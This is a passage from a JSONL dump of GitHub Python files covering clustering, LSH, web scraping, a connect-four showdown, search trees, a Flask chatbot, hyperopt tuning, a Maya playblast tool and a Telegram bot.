log.level.DEBUG,\n '發文限制登入次數',\n require_login_time\n )\n\n p = re.compile('退文篇數 [\\d]+ 篇以下')\n r = p.search(ori_screen)\n if r is not None:\n require_illegal_post = r.group(0).split(' ')[1]\n require_illegal_post = int(require_illegal_post)\n else:\n require_illegal_post = 0\n log.show_value(\n api.config,\n log.level.DEBUG,\n '發文限制退文篇數',\n require_illegal_post\n )\n\n board_info = data_type.BoardInfo(\n boardname,\n online_user,\n chinese_des,\n moderators,\n open_status,\n into_top_ten_when_hide,\n non_board_members_post,\n reply_post,\n self_del_post,\n push_post,\n boo_post,\n fast_push,\n min_interval,\n push_record_ip,\n push_aligned,\n moderator_can_del_illegal_content,\n tran_post_auto_recorded_and_require_post_permissions,\n cool_mode,\n require18,\n require_login_time,\n require_illegal_post,\n )\n return board_info\n","repo_name":"akpotter/PyPtt","sub_path":"PyPtt/_api_get_board_info.py","file_name":"_api_get_board_info.py","file_ext":"py","file_size_in_byte":8464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"} +{"seq_id":"31080931541","text":"import pandas as pd\nimport numpy as np\nfrom cuml.manifold.umap import UMAP as cumlUMAP\nfrom cuml.cluster import HDBSCAN\nfrom typing import Any, List, Dict, Tuple\n\nclass Clustering:\n def __init__(self, config: Any):\n self.config=config\n self.reduction_model = cumlUMAP(n_neighbors=self.config.n_neighbours, min_dist=self.config.min_distance, n_components=self.config.n_components, init=\"spectral\")\n self.cluster_model = HDBSCAN(\n min_samples=self.config.min_samples, \n min_cluster_size=self.config.min_cluster_size, \n max_cluster_size=self.config.max_cluster_size, \n cluster_selection_epsilon=self.config.cluster_selection_epsilon,\n metric=self.config.metric,\n 
alpha=self.config.alpha,\n p=self.config.p,\n cluster_selection_method=self.config.cluster_selection_method,\n allow_single_cluster=self.config.allow_single_cluster,\n gen_min_span_tree=self.config.gen_min_span_tree \n )\n\n def convert_to_numpy_arrays(self, doc_emb: List)->Tuple[List, np.array]:\n id_list = []\n emb_list = []\n # only takes last element of doc_emb\n for doc_dict in doc_emb:\n id_list = id_list + list(doc_dict.keys())\n for doc in doc_dict.keys():\n emb_list.append(doc_dict[doc].detach().numpy())\n doc_arrays = np.array(emb_list)\n print(f\"id length: {len(id_list)}\")\n print(\"doc array size: \", doc_arrays.shape)\n return id_list, doc_arrays\n\n def umap_reduce(self, doc_arrays: np.array):\n return self.reduction_model.fit_transform(doc_arrays) \n\n def cluster(self, embedding: np.array):\n return self.cluster_model.fit_predict(embedding)\n\n def reduce_and_cluster(self, doc_emb: List)->pd.DataFrame:\n print(\"umap reduction...\")\n id_list, doc_arrays = self.convert_to_numpy_arrays(doc_emb)\n g_embedding = self.umap_reduce(doc_arrays)\n print(\"clustering...\")\n labels = self.cluster(g_embedding)\n cluster_df = pd.DataFrame()\n cluster_df['id'] = id_list\n cluster_df['emb'] = doc_arrays.tolist()\n cluster_df['labels'] = labels\n return cluster_df\n\n def group_ids_by_labels(self, cluster_df: pd.DataFrame)->Dict:\n cluster_labels = cluster_df['labels'].unique()\n full_dict = {}\n for label in cluster_labels:\n cluster_ids = cluster_df[cluster_df['labels']==label]['id'].tolist()\n if label==-1:\n centroids = []\n else:\n centroids = np.mean(cluster_df[cluster_df['labels']==label]['emb'].tolist(),axis=0).tolist()\n cluster_dict = {\"id_list\":cluster_ids, \"centroid\":centroids}\n full_dict[str(label)] = cluster_dict\n return full_dict\n\n def generate_clusters(self, doc_emb):\n cluster_df = self.reduce_and_cluster(doc_emb)\n return self.group_ids_by_labels(cluster_df)","repo_name":"DinoHub/graph-tools","sub_path":"clustering/src/models/umap_hdbscan.py","file_name":"umap_hdbscan.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29022632309","text":"import math\nimport itertools\nimport collections\nfrom compare_sets import CompareSets\n\nclass LSH:\n \n def __init__(self, band_num=100, threshold=0.8):\n self.band_num = band_num\n self.threshold = threshold\n\n def similar(self, signature_df):\n similar_documents = []\n \n for candidate_1, candidate_2 in self.get_candidates(signature_df):\n similarity = CompareSets.compare(\n signature_df[candidate_1].tolist(),\n signature_df[candidate_2].tolist())\n if similarity >= self.threshold:\n similar_documents.append((candidate_1, candidate_2))\n\n return similar_documents\n \n def get_candidates(self, signature_df):\n num_of_signatures, num_of_documents = signature_df.shape\n rows_in_band = math.ceil(num_of_signatures / self.band_num)\n \n candidate_pairs = set()\n for i in range(self.band_num):\n band = signature_df[i*rows_in_band: (i+1)*rows_in_band]\n\n buckets = collections.defaultdict(set)\n for j in range(num_of_documents):\n band_id = tuple(band.iloc[:,j].tolist())\n buckets[band_id].add(j)\n\n for bucket in buckets.values():\n for pair in itertools.combinations(bucket, 2):\n candidate_pairs.add(pair)\n\n return candidate_pairs\n\n'''\nimport numpy as np\nlsh = LSH(2, 0.34)\narr = np.array([\n [\"7\", \"7\", \"c\"],\n [\"4\", \"4\", \"f\"], #rows are hashes\n [\"s\", \"a\", \"a\"]] #columns are 
documents\n)\nprint(lsh.similar(arr))\n'''","repo_name":"bubriks/ID2222","sub_path":"Homework 1/lsh.py","file_name":"lsh.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18441226631","text":"import requests\nimport bs4\nimport psycopg2 \nfrom datetime import datetime\n\n\ndef scrape_crypto(cur, conn):\n target_url = 'https://finance.yahoo.com/cryptocurrencies'\n res = requests.get(target_url)\n page = bs4.BeautifulSoup(res.content, 'html.parser')\n\n names = [name.text for name in page.find_all('td', attrs={'aria-label':'Name'})]\n prices = [float(price.find('span').text.replace(',','')) for price in page.find_all('td', attrs={'aria-label':'Price (Intraday)'})]\n changes = [float(change.text) for change in page.find_all('td', attrs={'aria-label':'Change'})]\n percent_changes = [float(percent_change.text.replace('%', '').replace(',', '')) for percent_change in page.find_all('td', attrs={'aria-label':'% Change'})]\n market_caps = [market_cap.text for market_cap in page.find_all('td', attrs={'aria-label':'Market Cap'})]\n total_volumes = [total_volume.text for total_volume in page.find_all('td', attrs={'aria-label':'Volume in Currency (Since 0:00 UTC)'})]\n circulate_supplys = [circulate_supply.text for circulate_supply in page.find_all('td', attrs={'aria-label':'Circulating Supply'})]\n\n\n current_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n for i in range(0, len(names)):\n cur.execute('INSERT INTO crypto (name, price, change, percent_change, market_cap, total_volume, circulate_supply, ts) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)',\n (names[i], prices[i], changes[i], percent_changes[i], market_caps[i], total_volumes[i], circulate_supplys[i], current_time))\n\n conn.commit()\n\n\n\n","repo_name":"tharidlynn/gdelt","sub_path":"yahoo/yahoo/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"10279954928","text":"import c4nn.mc as mc, c4nn.engine as engine, c4nn.config as config, pdb\nfrom tqdm import tqdm\n\ndef head2Head(isSelfPlayShowDown, exploratoryFlags, name1, name2, champVal, champPol, challVal, challPol, showDownSize, trainingRecursionCount1, trainingRecursionCount2 = None): # play selected amount of games between two models, return win counts\n\tif trainingRecursionCount2 == None:\n\t\ttrainingRecursionCount2 = trainingRecursionCount1\n\tchallWins = 0\n\tdrawCount = 0\n\tchampWins = 0\n\t# showTree = False\n\t# showBoard = True\n\t# treeDepth = 2\n\t\n\tprint(\"Showdown!!!\")\n\tfor _ in tqdm(range(showDownSize)):\n\t\tisRedTurn = _ % 2 == 0 # toggle first move\n\t\tcurrBoardState = engine.board()\n\t\tturnCount = 0\n\t\twhile True:\n\t\t\tcurrPlayer = mc.monteTree(currBoardState, True, champPol, champVal) if isRedTurn else mc.monteTree(currBoardState, False, challPol, challVal)\n\t\t\tfor _2 in range(trainingRecursionCount1 if isRedTurn else trainingRecursionCount2):\n\t\t\t\tcurrPlayer.nnSelectRec(currPlayer.root)\n\t\t\t# if showTree:\n\t\t\t\t# print(currPlayer.__str__(treeDepth))\n\t\t\ttemp = mc.monteTree.turnCountToTemp(turnCount) if exploratoryFlags[0] and isRedTurn or exploratoryFlags[1] and not isRedTurn else 1\n\t\t\tif temp < 1:\n\t\t\t\tcurrBoardState, rowNum, colNum = currPlayer.exploratoryMove(temp)\n\t\t\telse:\n\t\t\t\tcurrBoardState, rowNum, colNum = currPlayer.makeMove()\n\t\t\t# if showBoard:\n\t\t\t\t# 
currBoardState.printBoard()\n\t\t\t# pdb.set_trace()\n\t\t\tif currBoardState.checkWin(rowNum, colNum, isRedTurn):\n\t\t\t\tif isRedTurn:\n\t\t\t\t\tprint(\"\\n\" + name1 + \" wins!\")\n\t\t\t\t\tchampWins += 1\n\t\t\t\telse:\n\t\t\t\t\tprint(\"\\n\" + name2 + \" wins!\")\n\t\t\t\t\tchallWins += 1\n\t\t\t\tbreak\n\t\t\telif currBoardState.checkDraw():\n\t\t\t\tprint(\"\\nDraw!\")\n\t\t\t\tdrawCount += 1\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tisRedTurn = not isRedTurn\n\t\t\t\tturnCount += 1\n\t\tprint('''\tCurrent Stats:\n\t\t{} Wins: {}\n\t\t{} Wins: {}\n\t\tDraws: {}'''.format(name1, champWins, name2, challWins, drawCount))\n\t\tif isSelfPlayShowDown:\n\t\t\tif ((champWins) * config.winRatio) > (showDownSize - champWins - drawCount):\n\t\t\t\tprint(\"Challenger victory no longer possible. Ending showdown.\")\n\t\t\t\tbreak\n\t\t\telif ((challWins) / config.winRatio) > (showDownSize - challWins - drawCount):\n\t\t\t\tprint(\"Challenger wins! Ending showdown.\")\n\t\t\t\tbreak\n\tprint('''\tEnd Stats:\n\t\tGames Played: {}\n\t\t{} Wins: {}\n\t\t{} Wins: {}\n\t\tDraws: {}'''.format(champWins + challWins + drawCount, name1, champWins, name2, challWins, drawCount))\n\t\t\n\treturn champWins, challWins, drawCount","repo_name":"sgawalsh/djangoWebsite","sub_path":"c4nn/head2Head.py","file_name":"head2Head.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29737696096","text":"import numpy as np\nfrom math import log2\n\n\nclass LogarithmicSearch:\n\n def calcMae(self, blockSize, blockPoints, regionPoints):\n total = 0\n for x in range(blockSize):\n for y in range(blockSize):\n total += abs(\n self._I1[int(regionPoints[0]) + x][int(regionPoints[1]) + y] - self._I2[blockPoints[0] + x][blockPoints[1] + y])\n\n return total / blockSize ** 2\n\n def logPoints(self, blockSize, regionSize,\n regionTopLeftCorner):\n\n k = (regionSize / blockSize) / 4\n points = []\n for i in range(3):\n for j in range(3):\n points.append([(i + 1) * k * blockSize + regionTopLeftCorner[0] - blockSize / 2,\n (j + 1) * k * blockSize + regionTopLeftCorner[1] - blockSize / 2])\n\n return points\n\n def regionStart(self, blockTopLeftCorner, blockSize, regionSize):\n points = []\n for i in range(2):\n if blockTopLeftCorner[i] - (regionSize - blockSize) / 2 < 0:\n points.append(0)\n elif blockTopLeftCorner[i] + (regionSize + blockSize) / 2 > len(self._I1):\n val = blockTopLeftCorner[i] - (regionSize - blockSize) / 2\n val += len(self._I1) - (blockTopLeftCorner[i] + (regionSize + blockSize) / 2)\n points.append(val)\n else:\n points.append(blockTopLeftCorner[i] - (regionSize - blockSize) / 2)\n\n return np.array(points)\n\n def start(self, blockSize, regionSize):\n vectors = []\n\n for i in range(int(len(self._I2) / blockSize)):\n vectorsRow = []\n for j in range(int(len(self._I2[0]) / blockSize)):\n regionPoints = self.regionStart([i * blockSize, j * blockSize], blockSize, regionSize)\n tempRegionSize = regionSize\n bestOne = [0, 0]\n bestMAE = 255 * blockSize * blockSize\n for k in range(int(log2(regionSize / blockSize))):\n logPoints = self.logPoints(blockSize, tempRegionSize, regionPoints)\n for p in range(len(logPoints)):\n MAE = self.calcMae(blockSize, [i * blockSize, j * blockSize], logPoints[p])\n\n if MAE < bestMAE:\n bestMAE = MAE\n bestOne = logPoints[p]\n\n tempRegionSize /= 2\n\n vectorsRow.append([bestOne[0], bestOne[1], i * blockSize, j * blockSize])\n vectors.append(vectorsRow)\n\n return vectors\n\n def 
__init__(self, I1, I2):\n self._I1 = I1\n self._I2 = I2\n","repo_name":"furkankuse/Multimedia-Homeworks","sub_path":"MultimediaHW2/LogarithmicSearch.py","file_name":"LogarithmicSearch.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1747151270","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\nclass BinarySearchTree:\n def __init__(self): \n self.root = None\n\n def insert(self, data): \n if self.root == None:\n self.root = Node(data)\n else:\n current = self.root\n \n while True:\n if data < current.data:\n if current.left:\n current = current.left\n else:\n current.left = Node(data)\n break\n elif data > current.data:\n if current.right:\n current = current.right\n else:\n current.right = Node(data)\n break\n else:\n # data == current.data\n break\n\ndef preorder(root):\n # root, left, right\n if root == None:\n return\n\n print(root.data)\n preorder(root.left)\n preorder(root.right) \n\ndef inorder(root):\n # left, root, right\n if root == None:\n return\n\n inorder(root.left)\n print(root.data)\n inorder(root.right) \n\n\ndef postorder(root):\n # left, right, root\n if root == None:\n return\n\n postorder(root.left)\n postorder(root.right) \n print(root.data)\n\ndef preorderStack(root):\n stack = [root]\n\n while stack:\n current = stack.pop()\n \n print(current.data)\n if current.right: \n stack.append(current.right)\n if current.left: \n stack.append(current.left)\n\ndef inorderStack(root):\n stack = []\n current = root\n\n while stack or current:\n if current: \n stack.append(current)\n current = current.left\n else:\n current = stack.pop()\n print(current.data)\n current = current.right\n\ndef levelorder(root):\n queue = [root]\n \n while queue:\n current = queue.pop(0)\n print(current.data)\n\n if current.left:\n queue.append(current.left)\n if current.right:\n queue.append(current.right)\n\ndef search(root, value):\n if root == None:\n print(\"Not found\")\n return -1\n\n if value == root.data:\n return root.data\n \n if value < root.data:\n return search(root.left, value)\n else:\n return search(root.right, value)\n\ntree = BinarySearchTree()\ntree.insert(10)\ntree.insert(3)\ntree.insert(5)\ntree.insert(2)\ntree.insert(18)\ntree.insert(12)\ntree.insert(20)\n\nprint(\"PREORDER RECURSIVE:\")\npreorder(tree.root)\nprint(\"INORDER RECURSIVE:\")\ninorder(tree.root)\nprint(\"POSTORDER RECURSIVE:\")\npostorder(tree.root)\n\nprint(\"PREORDER STACK:\")\npreorderStack(tree.root)\nprint(\"INORDER STACK:\")\ninorderStack(tree.root)\n\nprint(\"LEVEL ORDER:\")\nlevelorder(tree.root)\n\nprint(search(tree.root, 5))\n\n\n\n\n","repo_name":"arif599/Data-Structures-and-Algorithms","sub_path":"Tree/BinarySearchTree.py","file_name":"BinarySearchTree.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39943330216","text":"import math\r\n\r\ndef square(radicand):\r\n perfect_squares = []\r\n gcf = 0\r\n for i in range(1, 17):\r\n perfect_squares.append(i**2)\r\n for i in range(16):\r\n if (radicand % perfect_squares[i]) == 0:\r\n gcf = perfect_squares[i]\r\n return (u\"{}\\u221A{}\").format(int(math.sqrt(gcf)), int(radicand / gcf))\r\n\r\ndef cube(radicand):\r\n perfect_cubes = []\r\n gcf = 0\r\n for i in range(1, 7):\r\n perfect_cubes.append(i**3)\r\n for i in range(6):\r\n if (radicand % perfect_cubes[i]) == 0:\r\n gcf = 
perfect_cubes[i]\r\n return (u\"{}\\u221A{}\").format(round(math.pow(gcf, 1/3)), int(radicand / gcf))\r\n\r\ndef tetra(radicand):\r\n perfect_tesseracts = []\r\n gcf = 0\r\n for i in range(1, 5):\r\n perfect_tesseracts.append(i**4)\r\n for i in range(4):\r\n if (radicand % perfect_tesseracts[i]) == 0:\r\n gcf = perfect_tesseracts[i]\r\n return (u\"{}\\u221A{}\").format(round(math.pow(gcf, 1/4)), int(radicand / gcf))\r\n\r\ndef penta(radicand):\r\n perfect_hypercubes = []\r\n gcf = 0\r\n for i in range(1, 4):\r\n perfect_hypercubes.append(i**5)\r\n for i in range(3):\r\n if (radicand % perfect_hypercubes[i]) == 0:\r\n gcf = perfect_hypercubes[i]\r\n return (u\"{}\\u221A{}\").format(round(math.pow(gcf, 1/5)), int(radicand / gcf))\r\n\r\ndef whole_to_mixed(index, radicand):\r\n if index == 2:\r\n return square(radicand)\r\n elif index == 3:\r\n return cube(radicand)\r\n elif index == 4:\r\n return tetra(radicand)\r\n elif index == 5:\r\n return penta(radicand)\r\n\r\n#index = int(input(\"Please enter an index for the whole radical: \"))\r\n#radical = int(input(\"Enter a number inside of a whole radical e.g. 5: \"))\r\n\r\n#print(round(math.pow(32, 1/5))\r\n\r\nprint(whole_to_mixed(2, 19860))\r\n\r\n#print((u\"{}\\u221A{}\").format(int(math.sqrt(squaregcf)), int(radical / squaregcf)))\r\n\r\nprint(\"Program Ended\")\r\n","repo_name":"Enprogames/Triangle_Drawing","sub_path":"wholetomixedradical.py","file_name":"wholetomixedradical.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43372811060","text":"a = int(input())\narr = []\nfor i in range(a):\n arr.append(list(map(int, input().split(' '))))\nfor i in range(a):\n cnt = 0\n avg = sum(arr[i][1:]) / (len(arr[i]) - 1)\n for j in range(1,len(arr[i])):\n if (arr[i][j] > avg):\n cnt += 1\n print('{:.3f}'.format(round((cnt / (len(arr[i]) - 1) * 100),3)),\"%\",sep = '')\n","repo_name":"3StarAnchovy/studyBaekjoon","sub_path":"Level5/studentAvg.py","file_name":"studentAvg.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"74088017481","text":"#! 
/usr/bin/python\n# -*- coding:utf-8 -*- \nimport requests\nfrom bs4 import BeautifulSoup\ndata={\n'type':'all',\n'content':''\n }\nheader={\n'Connection':'keep-alive',\n'Content-Type':'text/html;charset=UTF-8',\n'Server':'nginx/1.9.3',\n'Transfer-Encoding':'chunked',\n'Accept':'*/*',\n'Accept-Encoding':'gzip, deflate',\n'Accept-Language':'zh-CN,zh;q=0.9',\n'Connection':'keep-alive',\n'Content-Length':'858',\n'Content-Type':'application/x-www-form-urlencoded',\n'Cookie':'JSESSIONID=F59B0CD1162D1E5FB262E3FAE2E96E48; JSESSIONID=ED74A28FAD51091385C4C959E2E8FA1B',\n'Host':'ictclas.nlpir.org',\n'Origin':'http://ictclas.nlpir.org',\n'Referer':'http://ictclas.nlpir.org/nlpir/',\n'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',\n'X-Requested-With':'XMLHttpRequest'\n }\ndef save_to_file(file_name, contents):\n    fh = open(file_name, 'w')\n    fh.write(contents)\n    fh.close()\ndef cncorpus(args):\n    data['content'] = args\n    try:\n        html1 = requests.post('http://ictclas.nlpir.org/nlpir/index/getAllContentNew.do', data = data)\n        html = html1.text \n        soup = BeautifulSoup(html,\"lxml\")\n        return(eval(soup.get_text())['dividewords'])\n    except:\n        return(args)\n# process\nfo = open(\"../input.txt\", \"r\")\nfile=open('cas.txt','w')\ni = 0 \nfor line in fo.readlines(): \n    line = line.strip() \n    args = '正正正正正正正正正正正正正正正正正正正正正正正正正正正正正正'+line.split()[0]\n    corpus = cncorpus(args)[120:]\n    file.write(corpus)\n    file.write(\"\\n\")\n    file.flush()\n    i += 1\n    print(i)\nfo.close() \nfile.close()\n","repo_name":"FonzieTree/toobox","sub_path":"beautiful.py","file_name":"beautiful.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}
{"seq_id":"31166425040","text":"from flask import Flask, request, jsonify\nimport openai\nimport os\n\napp = Flask(__name__, static_folder='frontend/build', static_url_path='/')\n\n# Configure OpenAI API credentials via the environment instead of a hardcoded key\n# (the original file embedded a live-looking secret, which should never be committed)\nopenai.api_key = os.environ.get('OPENAI_API_KEY')\n\n@app.route('/chatbot', methods=['POST'])\ndef chatbot():\n    data = request.get_json()\n    message = data['message']\n\n    prompt = f\"I have a fashion-related question: {message}\"\n    \n    # Make a request to OpenAI API for the chatbot response\n    response = openai.Completion.create(\n        engine='text-davinci-003',\n        prompt=prompt,\n        max_tokens=50,\n        n=1,\n        stop=None,\n        temperature=0.7,\n        top_p=1,\n        frequency_penalty=0,\n        presence_penalty=0\n    )\n\n    answer = response.choices[0].text.strip()\n\n    return jsonify({'response': answer})\n\n@app.route('/')\ndef serve_frontend():\n    return app.send_static_file('index.html')\n\nif __name__ == '__main__':\n    app.run()\n","repo_name":"Solexi/styleBot","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"4748785003","text":"import unittest\nimport json\nfrom tests.base import BaseTestCase\n\n\nclass TestGetQuestion(BaseTestCase):\n    \"\"\"\n    Test suite for QuestionView Method View Class\n\n    Arguments:\n        BaseTestCase {Class} -- Base test class for running custom tests\n    \"\"\"\n    # GET\n\n    def test_get_question_by_id(self):\n        \"\"\"\n        Test successful GET request to fetch a question by id\n        \"\"\"\n        with self.client:\n            # post a question\n            _ = self.create_question()\n\n            # get that question by id\n            response = self.client.get(\n                '/api/v1/questions/1',\n                content_type='application/json'\n            )\n            data = 
json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertTrue(data['status'], 'success')\n self.assertTrue(data['question']['title'], 'second endpoint')\n self.assertIn('question', data)\n self.assertIsInstance(data['question']['answers'], list)\n\n def test_cant_get_question_with_out_of_range_index(self):\n \"\"\"\n Test unsuccessful GET request to fetch\n a question with an out of range id index\n \"\"\"\n with self.client:\n # post a question\n _ = self.create_question()\n\n # get that question by id\n response = self.client.get(\n '/api/v1/questions/20',\n content_type='application/json'\n )\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 400)\n self.assertRaises(KeyError)\n self.assertTrue(data['status'], 'failed')\n\n def test_get_question_with_wrong_content_type(self):\n \"\"\"\n Test unsuccessful GET request to\n fetch a question with wrong content type\n \"\"\"\n with self.client:\n response = self.client.get(\n '/api/v1/questions/1',\n content_type='xml'\n )\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 400)\n self.assertTrue(data['status'], 'failed')\n self.assertTrue(data['message'], 'request must be of type json')\n","repo_name":"mycok/stack-overflow-lite-API-v1","sub_path":"tests/test_get_single_question.py","file_name":"test_get_single_question.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"35033700769","text":"from unittest import TestCase\nfrom ds_exam.sequence_question import find_most_frequent\nimport random\n\n\nclass SequenceTest(TestCase):\n\n def test_implementation(self):\n in1 = [1]\n in2 = random.choices([2, 3, 4, 5, 6], k=100)\n in2 = in2 + [7]*101\n random.shuffle(in2)\n print(in2)\n out1 = find_most_frequent(in1)\n out2 = find_most_frequent(in2)\n self.assertEqual(out1, 1)\n self.assertEqual(out2, 7)\n","repo_name":"aviadkfbx/ds-exam","sub_path":"sequence_question_test.py","file_name":"sequence_question_test.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"73750192199","text":"import hyperopt as hp\nfrom hyperopt import Trials, fmin, space_eval\nfrom ItemCollaborativeFilter import ItemCollaborativeFilter\nfrom utils.run import RunRecommender\nimport numpy as np\nfrom utils.helper import Helper\n\nhelper = Helper()\n\nN_K_FOLD = 10\n\n### Step 1 : defining the objective function\ndef objective(params):\n print('###########################################')\n params[\"topK\"] = int(params[\"topK\"])\n print(\"Current parameters:\")\n print(params)\n loss = - RunRecommender.evaluate_on_validation_set(ItemCollaborativeFilter, params, Kfold=N_K_FOLD, parallel_fit=False, parallelize_evaluation=True)\n return loss\n\nsearch_space = {\n \"topK\": hp.hp.quniform('topK', 0, 1000, 5),\n \"shrink\": hp.hp.uniformint('shrink', 0, 50),\n \"bm_25_norm\": hp.hp.choice('bm_25_norm', [True, False]),\n \"normalize\": hp.hp.choice('normalize', [True, False]),\n \"similarity\": hp.hp.choice('similarity', [\"cosine\", \"jaccard\", \"dice\"])\n}\n\n\nif __name__ == '__main__':\n ### step 3 : storing the results of every iteration\n bayes_trials = Trials()\n MAX_EVALS = 100\n\n item_cf_parameters = {'shrink': 46.0, 'similarity': \"jaccard\", 'topK': 8}\n\n # Optimize\n best = fmin(fn=objective, space=search_space, algo=hp.tpe.suggest,\n max_evals=MAX_EVALS, 
trials=bayes_trials, verbose=True, points_to_evaluate=item_cf_parameters)\n\n    params = space_eval(search_space, best)\n\n    ### best will return the best hyperparameter set\n\n\n    print(\"Best parameters:\")\n    print(params)\n    params[\"topK\"] = int(params[\"topK\"])\n\n\n    # Evaluate using the decoded params from space_eval, not the raw index-valued fmin output\n    RunRecommender.evaluate_on_test_set(ItemCollaborativeFilter, params, parallel_fit=False, Kfold=N_K_FOLD, parallelize_evaluation=True)\n","repo_name":"d1ggs/RecSys_Challenge-2019","sub_path":"hyperopt_ICF.py","file_name":"hyperopt_ICF.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"27210898399","text":"import pymel.core as pm\nfrom pipeline_utilities import filenaming\n\n#setting the render settings\n\n\ndef getEditor():\n    \"\"\"\n    The modelEditor is the node in maya that contains all the information about a modelPanel. A panel is an object in maya that acts as the root of a ui element. The model editor\n    for instance holds information about what cameras have been added to a panel.\n    \"\"\"\n    if pm.modelEditor(\"mypanel\",exists=True):\n        print(\"the panel exists...deleting and creating a new one\")\n        pm.deleteUI(\"mypanel\") \n    \n    cam = pm.ls(selection=True)[0]\n    #SETTING CAMERA VIEWPORT SETTINGS\n    pm.camera(cam,edit=True,displayResolution=False,displayFilmGate=False)\n\n    window = pm.window(width=1280,height=720,backgroundColor=(1.0,0.0,0.0))\n    lay = pm.paneLayout()\n    pan = pm.modelPanel()\n    pm.modelEditor(\"mypanel\",camera=cam,activeView=True,displayAppearance=\"smoothShaded\")\n    pm.showWindow(window,window=True)\n\ndef setBlastSettings():\n    #these can only be set on global level\n    pm.setAttr(\"hardwareRenderingGlobals.multiSampleEnable\",1)\n    pm.setAttr(\"hardwareRenderingGlobals.ssaoEnable\",False)\n\n\ndef saveLocation():\n    \n    startpath = filenaming.getexportdir(\"playblast\")\n    exportfilepath = pm.fileDialog2(dialogStyle=2, startingDirectory=startpath,fileMode=3,caption=\"Select a save location\")\n\n    return exportfilepath[0]\n\ndef pcBlast(savepath,startf,endf):\n\n    #this runs the actual playblast \n    pm.playblast(format=\"image\",filename=savepath,startTime=startf,endTime=endf,compression=\"jpg\",widthHeight=[1920,1080],percent=100,framePadding=3,showOrnaments=False,viewer=False)\n    \n    \n    \n    \n\n\n    \n\n","repo_name":"all-in-one-of/polycat","sub_path":"pc_maya/exporters/pc_playblast.py","file_name":"pc_playblast.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"20394381910","text":"\"\"\"Implement Shell sort\"\"\"\ndef shell_sort(arr):\n    def shell_insert(arr,d):\n        n =len(arr) # compute the length of the array\n        for i in range(d,n):\n            j = i -d\n            temp = arr[i]\n            while(j >= 0 and arr[j] > temp): # scan backwards for the position of the first smaller element\n                arr[j+d]=arr[j]\n                j-=d\n            if j != i - d:\n                arr[j+d] = temp\n\n    n = len(arr)\n    if n<= 1:\n        return arr\n    d = n//2 # gap size for the list\n    while d >= 1:\n        shell_insert(arr,d)\n        d = d//2\n    return arr\n\nif __name__ == '__main__':\n    arr= [5, 1, 1, 2, 0, 0]\n    sort_1 = shell_sort(arr)\n    print(sort_1)","repo_name":"Allen19990307/PythonDeveloper","sub_path":"SortAlgorithms/shell_sort.py","file_name":"shell_sort.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"1854197128","text":"import config\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nimport logging\nimport db\n\ndef on_message(bot, update):\n    user = 
update.message.from_user\n    \n    logger.info(\"User %s sent '%s'\" % (user.username or user.id, update.message.text))\n    db_user = db.users.getOrCreateUser(user.id, user.username, user.first_name, user.last_name)\n    update.message.reply_text(config.IDLE_TEXT)\n    \ndef error_handler(bot, update, error):\n    logger.warning('Update \"%s\" caused error \"%s\"' % (update, error))\n\nif __name__ == \"__main__\":\n    logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n                        level=logging.INFO)\n    logger = logging.getLogger(__name__)\n    logFormatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n    fileHandler = logging.FileHandler(\"./log.txt\")\n    fileHandler.setFormatter(logFormatter)\n    logger.addHandler(fileHandler)\n    \n    # https://github.com/python-telegram-bot/python-telegram-bot/blob/master/examples/echobot2.py\n    updater = Updater(config.BOT_TOKEN)\n    dp = updater.dispatcher\n    dp.add_handler(CommandHandler(\"start\", on_message))\n    dp.add_handler(MessageHandler(Filters.text, on_message))\n    dp.add_error_handler(error_handler)\n    updater.start_polling()\n    logger.info(\"Idle bot started\")\n    